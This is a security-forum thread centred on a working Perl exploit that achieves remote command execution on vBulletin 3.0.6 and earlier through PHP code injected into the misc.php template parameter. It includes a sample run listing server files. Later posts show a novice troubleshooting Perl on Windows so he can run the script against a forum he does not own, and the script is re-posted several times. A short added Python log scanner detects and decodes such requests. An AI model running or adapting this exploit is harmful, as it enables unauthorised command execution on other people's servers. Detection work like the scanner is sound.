Waraxe IT Security Portal  
February 8, 2012
vbulletin <=3.0.6 misc.php remote execution (perl)
Posted: Tue Sep 20, 2005 3:27 pm
subzero
Valuable expert
Joined: Mar 16, 2005
Posts: 42

Quote:
#!/usr/bin/perl

# vBulletin <= 3.0.6 Add templates remote execute exploit (perl)
# suBzero@kisobox.com
# Reference: http://www.securityfocus.com/bid/12622/info
#

use IO::Socket;

if (@ARGV < 3)
{
print q(
[+] vBulletin <= 3.0.6 Add templates
[+] suBzero@kisobox.com
[+] Reference: http://www.securityfocus.com/bid/12622/info
[+] Usage : vbulletin306.pl example.com /forums/ "uname id" ;
);
exit;
}

$serv = $ARGV[0];
$dir = $ARGV[1];
$cmd = $ARGV[2];

$serv =~ s/(http:\/\/)//eg;
print "\n";
print " [+] vBulletin 3.0.6 kisobox.com \r\n";
print " [+] Sending regard to $serv$dir \r\n";
print " [+] Command $cmd \r\n";
print " [+] Exploiting on progress \r\n";

$cmd = "echo _START_;".$cmd.";echo _END_"; #strOke,dont kill me 4 this
$byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
$data = $dir;
$data .= "misc.php?do=page&template={\${passthru($byte)}}";

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] Connection error\r\n";

print $sock "GET $data HTTP/1.1\n";
print $sock "Host: $serv\n";
print $sock "Accept: */*\n";
print $sock "Content-Length: ".length($data)." \n".
print $sock "Connection: close\n\n";

$on = 0; #flag

while ($res = <$sock>)
{
if ($res =~ /^_END_/)
{ print "---------------------------------------------\r\n"; exit();}
if ($on == 1) { print "$res"; }
if ($res =~ /^_START_/)
{ $on = 1; }
}
print "[-] Exploit failed \r\n";
print "---------------------------------------------\r\n";


http://kisobox.com/exploits/vbulletin306.txt
save as .pl

example exploit

C:\>perl vbulletin306.pl xxx /forums/ "ls -la"

[+] vBulletin 3.0.6 kisobox.com
[+] Sending regard to xxx/forums/
[+] Command ls -la
[+] Exploiting on progress

1000
total 1204
drwxr-xr-x 15 511 root 4096 Sep 13 15:21 .
drwxrwxr-x 54 wwwuser wwwuser 4096 Jul 18 11:18 ..
-rw------- 1 root root 23910 Sep 19 16:01 DEADJOE
drwxr-xr-x 2 root root 4096 Oct 18 2003 admin
drwxr-xr-x 3 root root 4096 Jan 20 2005 admincp
-rw-r--r-- 1 root root 6694 Jan 20 2005 announcement.php
drwxr-xr-x 2 root root 4096 Jan 20 2005 archive
-rw-r--r-- 1 root root 7394 Jan 20 2005 attachment.php
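
A defender-side view of the request the script in the post above sends, as an added example that is not part of the original post: it scans web-server access-log lines for `misc.php?do=page` requests whose `template` parameter contains PHP variable syntax, and decodes any `chr()` chain to recover the command that was requested. The log lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote
# Constructed access-log lines (combined log format); addresses are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Sep/2005:15:30:01 +0000] "GET /forums/misc.php?do=showsmilies HTTP/1.1" 200 5120',
    '192.0.2.66 - - [20/Sep/2005:15:31:44 +0000] "GET /forums/misc.php?do=page&template={${passthru(chr(105).chr(100))}} HTTP/1.1" 200 312',
    '192.0.2.67 - - [20/Sep/2005:15:32:10 +0000] "GET /forums/misc.php?do=page&template=%7B%24%7Bpassthru(chr(105).chr(100))%7D%7D HTTP/1.1" 200 312',
    '192.0.2.11 - - [20/Sep/2005:15:33:00 +0000] "GET /forums/misc.php?do=page&template=rules HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
PHP_EXPR_RE = re.compile(r'\{\s*\$|\$\s*\{')  # "{$" or "${" inside the template name
CHR_CHAIN_RE = re.compile(r'chr\(\d{1,3}\)(?:\.chr\(\d{1,3}\))*')

def fully_unquote(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def decode_chr_chain(text):
    """Turn chr(105).chr(100)... back into the string it spells, or None."""
    match = CHR_CHAIN_RE.search(text)
    if not match:
        return None
    return bytes(int(c) % 256 for c in re.findall(r'\d+', match.group(0))).decode('latin-1')

def inspect_line(line):
    """Return a finding for a misc.php?do=page request whose template holds PHP syntax."""
    match = REQUEST_RE.match(line)
    if not match:
        return None
    client, target = match.groups()
    path, _, query = target.partition('?')
    params = {}
    for pair in query.split('&'):
        key, _, value = pair.partition('=')
        params.setdefault(fully_unquote(key), fully_unquote(value))
    template = params.get('template', '')
    if (not fully_unquote(path).lower().endswith('misc.php')
            or params.get('do') != 'page' or not PHP_EXPR_RE.search(template)):
        return None
    return {'client': client, 'template': template, 'command': decode_chr_chain(template)}

def scan(lines):
    return [finding for finding in map(inspect_line, lines) if finding]
```
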

Posted: Sat Feb 25, 2006 11:56 am
lookatmenow
Regular user
Joined: Feb 24, 2006
Posts: 21

i downloaded perl, put it in c:\perl

however, when i go to properties for command prompt, i change the starting directory to c:\

which comes up as c:\> when i open it. then i type in perl after that, which gives me c:\>perl

it says ''perl is not recognised as an internal or external command, operable programme or batch file''.

i then went back to the properties of the command prompt and changed the default directory to c:\perl

and when i open command prompt i type in after c:\perl>vbulletin306.pl although this merely opens the vbulletin.pl file into notepad.

i've tried executing the whole line with c:\perl>vbulletin306.pl website.com /forums/ "Is -la" then hit enter... and the same happens, just opens the .pl file into notepad.

would like to know where i'm going wrong. cheers.

Posted: Sun Feb 26, 2006 4:37 am
subzero
Valuable expert
Joined: Mar 16, 2005
Posts: 42

go to any open folder >> view >> folder option and disable by clicking the extension disable.

change save file to .pl.
i guess your previous file was saved as vb306.pl.txt.
correct me if I'm wrong.

Posted: Sun Feb 26, 2006 11:53 am
lookatmenow
Regular user
Joined: Feb 24, 2006
Posts: 21

It's saved as vb306.pl. Although when I look at the properties, its default program to open with is still 'notepad'. Should that be changed?

Posted: Sun Feb 26, 2006 3:39 pm
lookatmenow
Regular user
Joined: Feb 24, 2006
Posts: 21

Quote:

c:\>perl vbulletin306.pl
Backslash found where operator expected at vbulletin306.pl line 1, near "rtf1\"
Backslash found where operator expected at vbulletin306.pl line 1, near "ansi\"
Backslash found where operator expected at vbulletin306.pl line 1, near "ansicpg
1252\"
Backslash found where operator expected at vbulletin306.pl line 1, near "deff0\"

Backslash found where operator expected at vbulletin306.pl line 1, near "f0\"
Backslash found where operator expected at vbulletin306.pl line 1, near "fswiss\
"
syntax error at vbulletin306.pl line 1, near "rtf1\"
syntax error at vbulletin306.pl line 1, near "}}"
Execution of vbulletin306.pl aborted due to compilation errors.


i've got it working now, 'perl' that is. However, now there is this error that comes up. Here is the script of the vbulletin306.pl file:

Quote:

{\rtf1\ansi\ansicpg1252\deff0\deflang2057{\fonttbl{\f0\fswiss\fcharset0 Arial;}}
{\*\generator Msftedit 5.41.15.1507;}\viewkind4\uc1\pard\f0\fs20 #!/usr/bin/perl\par
\par
# vBulletin <= 3.0.6 Add templates remote execute exploit (perl)\par
# suBzero@kisobox.com\par
# Reference: http://www.securityfocus.com/bid/12622/info\par
#\par
\par
use IO::Socket;\par
\par
if (@ARGV < 3)\par
\{\par
print q(\par
[+] vBulletin <= 3.0.6 Add templates \par
[+] suBzero@kisobox.com\par
[+] Reference: http://www.securityfocus.com/bid/12622/info\par
[+] Usage : vbulletin306.pl example.com /forums/ "uname id" ;\par
); \par
exit;\par
\}\par
\par
$serv = $ARGV[0];\par
$dir = $ARGV[1];\par
$cmd = $ARGV[2];\par
\par
$serv =~ s/(http:\\/\\/)//eg;\par
print "\\n";\par
print " [+] vBulletin 3.0.6 kisobox.com \\r\\n";\par
print " [+] Sending regard to $serv$dir \\r\\n";\par
print " [+] Command $cmd \\r\\n";\par
print " [+] Exploiting on progress \\r\\n";\par
\par
$cmd = "echo _START_;".$cmd.";echo _END_"; #strOke,dont kill me 4 this\par
$byte = join('.', map \{ $_ = 'chr('.$_.')' \} unpack('C*', $cmd)); \par
$data = $dir;\par
$data .= "misc.php?do=page&template=\{\\$\{passthru($byte)\}\}";\par
\par
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] Connection error\\r\\n";\par
\par
print $sock "GET $data HTTP/1.1\\n";\par
print $sock "Host: $serv\\n";\par
print $sock "Accept: */*\\n";\par
print $sock "Content-Length: ".length($data)." \\n".\par
print $sock "Connection: close\\n\\n";\par
\par
$on = 0; #flag\par
\par
while ($res = <$sock>)\par
\{\par
if ($res =~ /^_END_/) \par
\{ print "---------------------------------------------\\r\\n"; exit();\}\par
if ($on == 1) \{ print "$res"; \}\par
if ($res =~ /^_START_/) \par
\{ $on = 1; \}\par
\}\par
print "[-] Exploit failed \\r\\n";\par
print "---------------------------------------------\\r\\n";\par
}


Is the script perhaps wrong? Although it is the one from kisobox.com/exploits/vbulletin306.txt

Posted: Sun Feb 26, 2006 3:47 pm
lookatmenow
Regular user
Joined: Feb 24, 2006
Posts: 21

o.k. Feel as though i'm getting closer. Although I now get this error:

Quote:

C:\>perl vb306.pl site.com /forum/ "Is -la"

[+] vBulletin 3.0.6 kisobox.com
[+] Sending regard to site.com/forum/
[+] Command Is -la
[+] Exploiting on progress
Can't locate object method "new" via package "IO::Socket::INET" (perhaps you for
got to load "IO::Socket::INET"?) at vb306.pl line 17.

c:\>


The script I now have in the .pl file is this:

Quote:

$serv = $ARGV[0];
$dir = $ARGV[1];
$cmd = $ARGV[2];

$serv =~ s/(http:\/\/)//eg;
print "\n";
print " [+] vBulletin 3.0.6 kisobox.com \r\n";
print " [+] Sending regard to $serv$dir \r\n";
print " [+] Command $cmd \r\n";
print " [+] Exploiting on progress \r\n";

$cmd = "echo _START_;".$cmd.";echo _END_"; #strOke,dont kill me 4 this
$byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
$data = $dir;
$data .= "misc.php?do=page&template={\${passthru($byte)}}";

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] Connection error\r\n";

print $sock "GET $data HTTP/1.1\n";
print $sock "Host: $serv\n";
print $sock "Accept: */*\n";
print $sock "Content-Length: ".length($data)." \n".
print $sock "Connection: close\n\n";

$on = 0; #flag

while ($res = <$sock>)
{
if ($res =~ /^_END_/)
{ print "---------------------------------------------\r\n"; exit();}
if ($on == 1) { print "$res"; }
if ($res =~ /^_START_/)
{ $on = 1; }
}
print "[-] Exploit failed \r\n";
print "---------------------------------------------\r\n";


Sorry about the number of posts. I'm quite the spammer ;)

Posted: Sun Feb 26, 2006 4:11 pm
lookatmenow
Regular user
Joined: Feb 24, 2006
Posts: 21

Sorted. ;)

I used the text from your quote in that first post, and made that the 'vb306.pl' file. I finally get to the 'exploit part', however I always get 'exploit failed', without the rest of the text following:

Quote:

c:\>perl vb306.pl site.com /forums/ "Is -la"

[+] vBulletin 3.0.6 kisobox.com
[+] Sending regard to site.com/forums/
[+] Command Is -la
[+] Exploiting on progress
[-] Exploit failed
---------------------------------------------

c:\>


Does this mean their forums are patched, to stop this exploit?
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2010 Janek Vind "waraxe"
